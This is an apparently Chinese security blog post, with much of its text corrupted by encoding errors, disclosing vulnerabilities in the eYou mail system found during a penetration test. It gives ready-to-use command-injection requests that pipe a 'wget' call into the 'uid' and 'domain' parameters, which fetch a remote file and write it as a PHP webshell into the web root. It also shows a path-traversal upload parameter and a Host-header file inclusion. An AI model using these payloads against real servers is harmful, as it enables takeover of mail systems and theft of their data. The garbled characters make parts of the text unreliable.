|
顯示不全請點擊全屏閱讀
最近在給一家市值過百億美金的公司做滲透測試�,發(fā)現(xiàn)其中一個域名用的億郵郵件系統(tǒng),就順便下了套億郵的源碼看了看,發(fā)現(xiàn)這套系統(tǒng)的安全性還停留在零幾年����,問題一大堆,找到一些getshell��,簡單列兩個����,再擰兩個稍微有意思的漏洞分享一下,就不寫詳細分析了��。
另外過段時間會更新一版代碼審計系統(tǒng)���,會加幾種漏洞類型的審計規(guī)則���,還有優(yōu)化誤報。這次發(fā)現(xiàn)億郵的所有漏洞都是Seay源代碼審計系統(tǒng)自動化挖掘到的�。
命令執(zhí)行1
http:///swfupload/upload_files.php?uid=
|wget+http://www./1.txt+-O+/var/eyou/apache/htdocs/swfupload/a.php&domain=
命令執(zhí)行2 GET /admin/domain/ip_login_set/d_ip_login_get.php?allow=allow&type=deny&domain=|wget+http://www./1.txt+-O+/var/eyou/apache/htdocs/grad/admin/a.php HTTP/1.1
Host: mail.
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Length: 0
cookie: cookie=admin 1
DNT: 1
Connection: keep-alive 
任意文件上傳
Swfupload/upload_files.php? uid=admin&token=youtoken/../../ 
這里本來可以無需登陸直接上傳任意文件的���,但是在linux下���,is_dir()函數(shù)判斷一個路徑是否是目錄,在用../跳轉(zhuǎn)目錄時��,必須路徑中的目錄都存在,但是windows下面可以是不存在的路徑����,到底是系統(tǒng)問題還是php問題,這個等有時間再去研究��。
看看這個圖就明白了 
很多文件頭頂還有一個文件包含��,但是是http頭里面的host字段�����,在網(wǎng)站是默認情況下���,這個host是可以偽造的����,但是不能有斜杠這域名中不存在的字符�,否則會400錯誤,所以這里只能包含同目錄下面的文件��。 
|
